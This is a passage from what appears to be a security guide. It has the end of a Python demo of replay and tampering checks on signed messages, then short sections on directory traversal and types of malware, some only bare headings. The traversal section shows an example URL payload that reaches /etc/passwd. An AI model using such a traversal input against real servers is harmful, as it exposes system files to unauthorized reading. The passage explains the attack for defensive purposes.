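    msg = sign_message(SHARED_KEY, {"action": "transfer", "amount": 100},
                       nonce="n-1", ts=now)
    results = [recv.accept(msg, now)]              # first delivery
    results.append(recv.accept(msg, now + 5))      # same bytes replayed 5 s later
    stale = sign_message(SHARED_KEY, {"action": "transfer", "amount": 100},
                         nonce="n-2", ts=now - 600)
    results.append(recv.accept(stale, now))        # old capture, fresh nonce
    tampered = dict(msg, payload={"action": "transfer", "amount": 100000})
    results.append(recv.accept(tampered, now))     # edited amount, old MAC
    return results


if __name__ == "__main__":
    print(demo())
```

The timestamp window is what keeps the nonce set bounded: once a message is older than `MAX_SKEW_SECONDS` it is rejected on freshness alone, so nonces older than that can be forgotten. Without the window, the receiver would have to remember every nonce forever.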
Prevention Techniques
Mitigation Strategies
Directory Traversal
Directory traversal, also known as path traversal, is a type of cyber attack
that allows an attacker to access restricted files and directories on a server,
usually with the goal of obtaining sensitive information. This vulnerability
occurs when user input is not adequately validated and the attacker can
manipulate it to traverse the server directory structure.
How it Works
For example, consider a web application that allows users to view the
contents of a specific file by specifying its path through a URL parameter,
such as:
https://www.example.com/file.php?path=/user/documents/report.pdf
https://www.example.com/file.php?path=../../../../etc/passwd
If the server doesn’t properly validate and sanitize the input, it might reveal
the contents of the /etc/passwd file, which contains sensitive information
about system users.
Mitigation Techniques
Malware
Malware, short for malicious software, refers to any software intentionally
created to cause harm to a computer system, server, network, or user. It is a
broad term that encompasses various types of harmful software created by
cybercriminals for various purposes. In this guide, we will delve deeper into
the major types of malware and their characteristics.
Virus
host is executed. Viruses can corrupt, delete or modify data, and slow down
system performance.
Worm
Trojan Horse
Ransomware
Spyware
Adware
Rootkit
Keylogger
Keyloggers are a type of malware that monitor and record users’ keystrokes,
allowing attackers to capture sensitive information, such as login credentials
or financial information entered on a keyboard.
Understanding the different types of malware can help you better identify
and protect against various cyber threats. As the cyber landscape continues
to evolve, it’s essential to stay informed about emerging malware and equip
yourself with the necessary security skills and knowledge.